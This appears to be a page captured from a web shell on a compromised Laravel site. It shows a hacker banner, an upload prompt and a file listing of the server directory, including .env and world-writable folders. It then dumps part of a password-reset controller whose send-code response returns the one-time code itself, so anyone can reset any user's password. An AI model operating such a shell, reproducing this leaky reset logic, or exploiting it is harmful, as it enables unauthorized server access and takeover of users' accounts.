I am a hacker in the dark of a very cold night
path :/var/www/html/vorne.webheaydemo.com
upload file:
List of files:
| name file |
size |
edit |
permission |
action |
| .editorconfig | 276 KB | March 05 2024 07:12:34 | 0666 |
|
| .env | 1385 KB | May 24 2024 16:43:55 | 0666 |
|
| .env.example | 1088 KB | March 05 2024 07:12:34 | 0666 |
|
| .gitattributes | 190 KB | March 05 2024 07:12:34 | 0666 |
|
| .gitignore | 245 KB | March 05 2024 07:12:34 | 0666 |
|
| .htaccess | 947 KB | July 04 2023 21:25:08 | 0664 |
|
| .rnd | 1024 KB | March 13 2024 04:51:14 | 0666 |
|
| README.md | 472 KB | March 22 2024 10:35:00 | 0666 |
|
| app | - | March 05 2024 07:12:34 | 0777 |
|
| artisan | 1739 KB | March 05 2024 07:12:34 | 0666 |
|
| bootstrap | - | March 05 2024 07:12:34 | 0777 |
|
| composer.json | 2829 KB | May 13 2024 12:10:04 | 0666 |
|
| composer.lock | 417205 KB | March 19 2024 12:13:14 | 0666 |
|
| config | - | July 03 2025 02:53:36 | 0777 |
|
| database | - | March 05 2024 07:12:34 | 0777 |
|
| index.php | 1816 KB | May 13 2024 10:32:36 | 0666 |
|
| lang | - | May 13 2024 14:53:26 | 0777 |
|
| manifest.json | 913 KB | May 14 2024 03:57:26 | 0664 |
|
| package.json | 398 KB | March 05 2024 07:12:34 | 0666 |
|
| phpunit.xml | 1206 KB | March 05 2024 07:12:34 | 0666 |
|
| public | - | July 03 2025 02:37:20 | 0777 |
|
| resources | - | May 13 2024 12:09:36 | 0777 |
|
| routes | - | March 05 2024 07:12:34 | 0777 |
|
| service-worker.js | 924 KB | March 05 2024 07:12:34 | 0666 |
|
| storage | - | March 05 2024 10:03:52 | 0777 |
|
| symlink.php | 218 KB | March 05 2024 07:12:34 | 0666 |
|
| tests | - | March 05 2024 07:12:34 | 0777 |
|
| vendor | - | March 19 2024 12:13:14 | 0777 |
|
| vite.config.js | 326 KB | March 05 2024 07:12:34 | 0666 |
|
all(), [
'credentials' => "required|string|max:100",
]);
if ($validator->fails()) {
$message = ['error' => $validator->errors()->all()];
return ApiResponse::validation($message);
}
$column = "username";
if (check_email($request->credentials)) $column = "email";
$user = User::where($column, $request->credentials)->first();
if (!$user) {
$message = ['error' => ["User doesn't exists."]];
return ApiResponse::error($message);
}
$token = generate_unique_string("user_password_resets", "token", 80);
$code = generate_random_code();
try {
UserPasswordReset::where("user_id", $user->id)->delete();
$password_reset = UserPasswordReset::create([
'user_id' => $user->id,
'token' => $token,
'code' => $code,
]);
$user->notify(new PasswordResetEmail($user, $password_reset));
} catch (Exception $e) {
info($e);
$message = ['error' => [__('Something went wrong! Please try again')]];
return ApiResponse::error($message);
}
$data = ['user' => $password_reset];
$message = ['success' => [__('Verification otp code sended to your email address')]];
return ApiResponse::success($message, $data);
}
/**
* OTP Verification.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
public function verifyCode(Request $request)
{
$token = $request->token;
$request->merge(['token' => $token]);
$rules = [
'token' => "required|string|exists:user_password_resets,token",
'otp' => "required|numeric|exists:user_password_resets,code",
];
$validator = Validator::make($request->all(), $rules);
if ($validator->fails()) {
$message = ['error' => $validator->errors()->all()];
return ApiResponse::validation($message);
}
$basic_settings = BasicSettingsProvider::get();
$otp_exp_seconds = $basic_settings->otp_exp_seconds ?? 0;
$password_reset = UserPasswordReset::where("token", $token)->first();
if (Carbon::now() >= $password_reset->created_at->addSeconds($otp_exp_seconds)) {
foreach (UserPasswordReset::get() as $item) {
if (Carbon::now() >= $item->created_at->addSeconds($otp_exp_seconds)) {
$item->delete();
}
}
$message = ['error' => [__('Session expired. Please try again')]];
return ApiResponse::error($message);
}
if ($password_reset->code != $request->otp) {
$message = ['error' => [__('Verification OTP invalid')]];
return ApiResponse::error($message);
}
$data = ['password_reset_data' => $password_reset];
$message = ['success' => [__('OTP verification successful')]];
return ApiResponse::success($message, $data);
}
/**
* Password Reset.
*
* @method POST
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
public function resetPassword(Request $request)
{
if ($request->password != $request->password_confirmation) {
$message = ['error' => [__('Oops password does not match')]];
return ApiResponse::error($message);
}
$token = $request->token;
$basic_settings = BasicSettingsProvider::get();
$password_rule = "required|string|min:6|confirmed";
if ($basic_settings->secure_password) {
$password_rule = ["required", Password::min(8)->letters()->mixedCase()->numbers()->symbols()->uncompromised(), "confirmed"];
}
$request->merge(['token' => $token]);
$rules = [
'token' => "required|string|exists:user_password_resets,token",
'password' => $password_rule,
];
$validator = Validator::make($request->all(), $rules);
if ($validator->fails()) {
$message = ['error' => $validator->errors()->all()];
return ApiResponse::error($message);
}
$password_reset = UserPasswordReset::where("token", $token)->first();
if (!$password_reset) {
$message = ['error' => [__('Invalid Request. Please try again')]];
return ApiResponse::success($message);
}
try {
$password_reset->user->update(['password' => Hash::make($request->password)]);
$password_reset->delete();
} catch (Exception $e) {
info($e);
$message = ['error' => [__('Something went wrong! Please try again')]];
return ApiResponse::success($message);
}
$message = ['success' => [__('Password reset success. Please login with new password')]];
return ApiResponse::success($message);
}
}